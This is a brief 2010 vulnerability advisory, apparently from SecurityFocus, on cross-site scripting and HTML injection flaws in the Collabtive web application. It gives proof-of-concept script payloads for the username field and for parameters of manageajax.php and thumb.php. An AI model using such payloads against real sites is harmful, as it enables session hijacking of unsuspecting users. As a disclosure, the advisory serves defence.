Collabtive Cross Site Scripting and HTML Injection Vulnerabilities

Attackers can use a browser to exploit these issues. To exploit a cross-site scripting vulnerability, an attacker must entice an unsuspecting user to follow a malicious URI.

HTML-Injection:
Enter the value <script>alert(/SV/)</script> in the username field under the "change username" functionality.


Cross-site scripting:
The following example URIs are available:

http://www.example.com/manageajax.php?action=newcal&y=<script>alert(/XSS/)</script>
http://www.example.com/thumb.php?pic=<script>alert(/XSS/)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus